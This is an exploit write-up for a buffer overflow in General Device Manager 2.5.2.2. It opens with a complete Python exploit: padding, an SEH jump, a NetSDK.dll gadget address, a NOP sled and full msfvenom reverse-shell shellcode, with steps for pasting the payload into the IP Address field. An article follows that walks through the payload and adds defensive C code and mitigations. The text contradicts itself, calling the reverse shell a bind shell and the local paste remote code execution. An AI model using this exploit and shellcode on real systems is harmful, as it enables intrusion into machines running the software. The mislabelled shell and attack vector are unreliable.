General Device Manager 2.5.2.2 - Buffer Overflow (SEH)
# Exploit Title: General Device Manager 2.5.2.2 - Buffer Overflow (SEH)
# Date: 30.07.2023
# Software Link: https://download.xm030.cn/d/MDAwMDA2NTQ=
# Software Link 2: https://www.maxiguvenlik.com/uploads/importfiles/General_DeviceManager.zip
# Exploit Author: Ahmet Ümit BAYRAM
# Tested Version: 2.5.2.2
# Tested on: Windows 10 64bit
# 1.- Run python code : exploit.py
# 2.- Open pwned.txt and copy all content to clipboard
# 3.- Open Device Manage and press Add Device
# 4.- Paste the content of pwned.txt into the 'IP Address'
# 5.- Click 'OK'
# 6.- nc.exe local IP Port 1337 and you will have a bind shell
# 7.- R.I.P. Condor <3
import struct
offset = b"A" * 1308
nseh = b"\xEB\x06\x90\x90" # jmp short
seh = struct.pack('<I', 0x10081827) # 0x10081827 : pop ebx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [NetSDK.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.0.8.66 (C:\Program Files (x86)\DeviceManage\NetSDK.dll)
nops = b"\x90" * 32
#shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -f python --var-name shellcode
shellcode = b""
shellcode += b"\xd9\xc6\xbb\xae\xc7\xed\x8e\xd9\x74\x24\xf4"
shellcode += b"\x5a\x29\xc9\xb1\x52\x83\xea\xfc\x31\x5a\x13"
shellcode += b"\x03\xf4\xd4\x0f\x7b\xf4\x33\x4d\x84\x04\xc4"
shellcode += b"\x32\x0c\xe1\xf5\x72\x6a\x62\xa5\x42\xf8\x26"
shellcode += b"\x4a\x28\xac\xd2\xd9\x5c\x79\xd5\x6a\xea\x5f"
shellcode += b"\xd8\x6b\x47\xa3\x7b\xe8\x9a\xf0\x5b\xd1\x54"
shellcode += b"\x05\x9a\x16\x88\xe4\xce\xcf\xc6\x5b\xfe\x64"
shellcode += b"\x92\x67\x75\x36\x32\xe0\x6a\x8f\x35\xc1\x3d"
shellcode += b"\x9b\x6f\xc1\xbc\x48\x04\x48\xa6\x8d\x21\x02"
shellcode += b"\x5d\x65\xdd\x95\xb7\xb7\x1e\x39\xf6\x77\xed"
shellcode += b"\x43\x3f\xbf\x0e\x36\x49\xc3\xb3\x41\x8e\xb9"
shellcode += b"\x6f\xc7\x14\x19\xfb\x7f\xf0\x9b\x28\x19\x73"
shellcode += b"\x97\x85\x6d\xdb\xb4\x18\xa1\x50\xc0\x91\x44"
shellcode += b"\xb6\x40\xe1\x62\x12\x08\xb1\x0b\x03\xf4\x14"
shellcode += b"\x33\x53\x57\xc8\x91\x18\x7a\x1d\xa8\x43\x13"
shellcode += b"\xd2\x81\x7b\xe3\x7c\x91\x08\xd1\x23\x09\x86"
shellcode += b"\x59\xab\x97\x51\x9d\x86\x60\xcd\x60\x29\x91"
shellcode += b"\xc4\xa6\x7d\xc1\x7e\x0e\xfe\x8a\x7e\xaf\x2b"
shellcode += b"\x1c\x2e\x1f\x84\xdd\x9e\xdf\x74\xb6\xf4\xef"
shellcode += b"\xab\xa6\xf7\x25\xc4\x4d\x02\xae\x94\x91\x0c"
shellcode += b"\x2f\x03\x90\x0c\x2a\xea\x1d\xea\x5e\x1c\x48"
shellcode += b"\xa5\xf6\x85\xd1\x3d\x66\x49\xcc\x38\xa8\xc1"
shellcode += b"\xe3\xbd\x67\x22\x89\xad\x10\xc2\xc4\x8f\xb7"
shellcode += b"\xdd\xf2\xa7\x54\x4f\x99\x37\x12\x6c\x36\x60"
shellcode += b"\x73\x42\x4f\xe4\x69\xfd\xf9\x1a\x70\x9b\xc2"
shellcode += b"\x9e\xaf\x58\xcc\x1f\x3d\xe4\xea\x0f\xfb\xe5"
shellcode += b"\xb6\x7b\x53\xb0\x60\xd5\x15\x6a\xc3\x8f\xcf"
shellcode += b"\xc1\x8d\x47\x89\x29\x0e\x11\x96\x67\xf8\xfd"
shellcode += b"\x27\xde\xbd\x02\x87\xb6\x49\x7b\xf5\x26\xb5"
shellcode += b"\x56\xbd\x47\x54\x72\xc8\xef\xc1\x17\x71\x72"
shellcode += b"\xf2\xc2\xb6\x8b\x71\xe6\x46\x68\x69\x83\x43"
shellcode += b"\x34\x2d\x78\x3e\x25\xd8\x7e\xed\x46\xc9"
final_payload = offset + nseh + seh + nops + shellcode
# write the final payload to a file
try:
    with open('pwned.txt', 'wb') as f:
        print("[+] Creating %s bytes evil payload..." % len(final_payload))
        f.write(final_payload)
    # the with block closes the file
    print("[+] File created!")
except:
    print("File cannot be created!")

Exploiting Buffer Overflow in General Device Manager 2.5.2.2: A Deep Dive into SEH-Based Remote Code Execution
On July 30, 2023, a critical vulnerability was disclosed in General Device Manager 2.5.2.2, a widely used device management application for Windows environments. This vulnerability, a stack buffer overflow exploited through the SEH (Structured Exception Handler) chain, allows attackers to achieve code execution through a seemingly innocuous input field, the IP Address. This article provides a technical analysis of the exploit, including its underlying mechanics, the role of SEH, and how the payload is used to execute code on the target.
Understanding the Vulnerability: Buffer Overflow in IP Address Input
The vulnerability arises from improper input validation in the Add Device functionality of General Device Manager. When a user enters an IP address, the application fails to properly validate the length of the input, allowing an attacker to craft a malicious payload that overflows the stack buffer.
Exploitation is triggered by a simple sequence of actions:
- Run the provided exploit.py script to generate a malicious payload.
- Copy the output from pwned.txt into the clipboard.
- Open the application and select Add Device.
- Paste the payload into the IP Address field.
- Click OK to trigger the overflow.
Upon execution, the application crashes, but the attacker's payload hijacks the exception handling mechanism—SEH—to redirect execution flow to a custom shellcode.
SEH-Based Exploitation: How the Exception Handler Becomes a Weapon
Structured Exception Handling (SEH) is a Windows mechanism used to manage runtime exceptions. In the context of exploit development, SEH is particularly dangerous when SafeSEH is disabled and ASLR is not applied.
As confirmed in the exploit details:
- SafeSEH: False – The application does not enforce SafeSEH protection, allowing arbitrary SEH records to be used.
- ASLR: False – The binary is not randomized in memory, making it predictable.
- Rebase: False – The DLL is loaded at a fixed address, simplifying exploitation.
These conditions make SEH exploitation feasible. The attacker overwrites the SEH record with a controlled handler address, so that exception dispatch hands control to a gadget of the attacker's choosing instead of a legitimate handler.
Exploit Payload Structure: Breaking Down the Components
offset = b"A" * 1308
nseh = b"\xEB\x06\x90\x90" # jmp short
seh = struct.pack('<I', 0x10081827) # pop ebx # pop esi # ret | NetSDK.dll
nops = b"\x90" * 32
shellcode = b"" # MSFvenom-generated reverse shell
This payload is structured into five components:
1. Offset (1308 Bytes of 'A')
The offset is a padding sequence used to reach the exact location of the SEH record on the stack. The value 1308 was determined through binary analysis and fuzzing to align the payload precisely with the SEH pointer.
2. Next SEH (nseh) – Jump Short
The nseh value \xEB\x06\x90\x90 is a jmp short instruction with an 8-bit displacement of 6. The displacement is counted from the byte after the 2-byte instruction, so the jump lands 8 bytes past the start of nseh: over the 4-byte SEH pointer and onto the NOP sled. It is placed immediately after the offset because the pop pop ret gadget in the SEH pointer returns into exactly these bytes once the handler is invoked.
Why this matters: without a valid jump in nseh, the exploit would fail during exception handling, because the gadget's ret would land on bytes that do not lead to the shellcode.
3. SEH Pointer (seh)
The seh field is set to 0x10081827, a known pop ebx # pop esi # ret gadget located in NetSDK.dll. This gadget is crucial because:
- It is reliable and predictable (ASLR disabled).
- It allows the attacker to control the stack state.
- It can be used to pivot to the shellcode.
When the buffer overflow triggers an exception, the dispatcher calls this address as the exception handler; the two pops discard two stack slots and the ret returns into the overwritten nseh bytes, redirecting execution.
4. NOP Sled (nops)
The nops sled (32 bytes of \x90) provides a safety margin. If the shellcode is slightly misaligned, the NOPs ensure execution continues until it reaches the actual shellcode.
5. Shellcode: Reverse Shell via msfvenom
The shellcode is generated using msfvenom with the following parameters:
msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -f python --var-name shellcode
This produces a reverse TCP shell that connects back to the attacker’s machine on port 1337. The EXITFUNC=thread ensures the shellcode exits cleanly by terminating the thread, avoiding application crashes.
The bad-character list \x00\x0a\x0d keeps null bytes and line-ending characters out of the encoded shellcode, since they would truncate or break the payload in a string-based input field.
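An added example for the analyst's side, not code from the exploit: it dissects a blob in the layout described above (padding, nseh, seh, NOP sled) and computes where the short jump in nseh actually lands. The sample blob is constructed here with a placeholder string in place of the msfvenom output.

```c
/* Added example, not part of the exploit: dissects the padding / nseh / seh /
 * NOP-sled layout and resolves the short jump in nseh. The sample blob is
 * constructed below with a placeholder instead of real shellcode. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>

struct seh_layout {
    size_t pad_len;       /* length of the 'A' run before nseh */
    uint32_t handler;     /* little-endian address in the seh field */
    long jmp_target;      /* offset the short jump lands on, -1 if nseh is not a jmp short */
    int lands_on_nops;    /* 1 if jmp_target points at a 0x90 byte */
};

/* Parses buf; returns 0 if it is too short to hold the nseh and seh fields. */
int dissect(const unsigned char *buf, size_t len, struct seh_layout *out) {
    size_t i = 0;
    while (i < len && buf[i] == 'A') i++;            /* measure the padding */
    if (i + 8 > len) return 0;
    out->pad_len = i;
    out->handler = (uint32_t)buf[i + 4] | (uint32_t)buf[i + 5] << 8 |
                   (uint32_t)buf[i + 6] << 16 | (uint32_t)buf[i + 7] << 24;
    out->jmp_target = -1;
    out->lands_on_nops = 0;
    if (buf[i] == 0xEB) {                             /* opcode of jmp short rel8 */
        int8_t rel = (int8_t)buf[i + 1];
        /* rel8 is relative to the byte after the 2-byte instruction, so
         * EB 06 lands at nseh + 8: over the 4-byte handler, onto the sled */
        out->jmp_target = (long)(i + 2) + rel;
        if (out->jmp_target >= 0 && (size_t)out->jmp_target < len &&
            buf[out->jmp_target] == 0x90)
            out->lands_on_nops = 1;
    }
    return 1;
}

/* Builds a constructed sample in the exploit's shape; returns its length. */
size_t build_sample(unsigned char *buf, size_t cap) {
    static const unsigned char nseh[4] = {0xEB, 0x06, 0x90, 0x90};
    static const unsigned char seh[4]  = {0x27, 0x18, 0x08, 0x10};  /* 0x10081827 */
    size_t n = 0;
    if (cap < 1308 + 4 + 4 + 32 + 9) return 0;
    memset(buf + n, 'A', 1308); n += 1308;
    memcpy(buf + n, nseh, 4);   n += 4;
    memcpy(buf + n, seh, 4);    n += 4;
    memset(buf + n, 0x90, 32);  n += 32;
    memcpy(buf + n, "SHELLCODE", 9); n += 9;    /* placeholder, not shellcode */
    return n;
}
```

For the page's values the jump resolves to offset 1316, which is the first byte of the NOP sled, confirming that the handler address at 1312..1315 is skipped rather than executed as code.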
Execution and Post-Exploitation: Achieving a Bind Shell
After the payload is pasted into the IP Address field and the OK button is clicked, the application triggers the buffer overflow. The exception handler is invoked, and the SEH chain is hijacked via the 0x10081827 gadget.
At this point, the shellcode is executed. The reverse shell connects to the attacker’s listener:
nc.exe 127.0.0.1 1337
Result: A bind shell is established, allowing full remote access to the target system.
Security Implications and Mitigation Strategies
This exploit highlights a critical flaw in software design: input validation and buffer safety. The vulnerability exists due to:
- Use of unsafe functions like strcpy or gets in the input processing.
- Failure to implement stack protection mechanisms.
- Reliance on predictable memory layouts (no ASLR).
Recommended mitigations:
- Replace unsafe string functions with strncpy, snprintf, or strcpy_s.
- Enable ASLR and SafeSEH in compilation.
- Implement stack canaries and DEP (Data Execution Prevention).
- Use input sanitization and length validation for all user inputs.
- Regularly update and patch software, especially third-party libraries.
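An added example, not code from the exploit or from the vendor: the defect the article describes (an unbounded copy of the IP Address field into a fixed stack buffer) next to a hardened version that validates length and format before copying. Function and buffer names are assumptions.

```c
/* Added example, not the vendor's code: unbounded copy of the "IP Address"
 * field (the defect described above) beside a hardened form that checks
 * length and format first. Names are assumptions. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define IP_BUF_LEN 16   /* "255.255.255.255" plus the terminating NUL */

/* Vulnerable form: no length check, so a 1308+ byte string overruns ip_addr
 * and the SEH record above it. Comparison only; never call with untrusted input. */
void add_device_unsafe(const char *input) {
    char ip_addr[IP_BUF_LEN];
    strcpy(ip_addr, input);      /* the overflow */
    printf("adding device %s\n", ip_addr);
}

/* Returns 1 if s is a strict dotted-quad IPv4 literal (four decimal octets in
 * 0..255, nothing else), 0 otherwise. Length is checked before any parsing. */
int is_valid_ipv4(const char *s) {
    size_t n = strlen(s);
    if (n == 0 || n >= IP_BUF_LEN) return 0;   /* too long for ip_addr */
    int octets = 0; const char *p = s;
    while (*p) {
        if (!isdigit((unsigned char)*p)) return 0;   /* "1..2", ".1.2.3", "a.b" */
        int v = 0, digits = 0;
        while (isdigit((unsigned char)*p)) {
            v = v * 10 + (*p - '0');
            if (++digits > 3 || v > 255) return 0;
            p++;
        }
        octets++;
        if (*p == '.') {
            if (octets == 4 || p[1] == '\0') return 0;  /* fifth octet or trailing dot */
            p++;
        } else if (*p != '\0') {
            return 0;                                   /* stray character */
        }
    }
    return octets == 4;
}

/* Hardened form: validate, then copy with an explicit bound. Returns 1 when
 * the address was stored, 0 when the input was rejected. */
int add_device_safe(const char *input, char *ip_addr, size_t ip_addr_len) {
    if (ip_addr_len < IP_BUF_LEN || !is_valid_ipv4(input)) return 0;
    snprintf(ip_addr, ip_addr_len, "%s", input);   /* cannot overrun ip_addr */
    return 1;
}
```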
Expert Insight: Why This Exploit Is Still Relevant
Despite the age of the software (2.5.2.2), this exploit remains highly relevant due to:
- Its simplicity and reproducibility.
- Its use of classic, well-documented techniques (SEH, NOP sled).
- It needs no bypass of modern security controls, because ASLR and SafeSEH are absent from the module it relies on.
Attackers can still leverage such vulnerabilities in legacy systems, especially in industrial or IoT environments where software updates are delayed or neglected.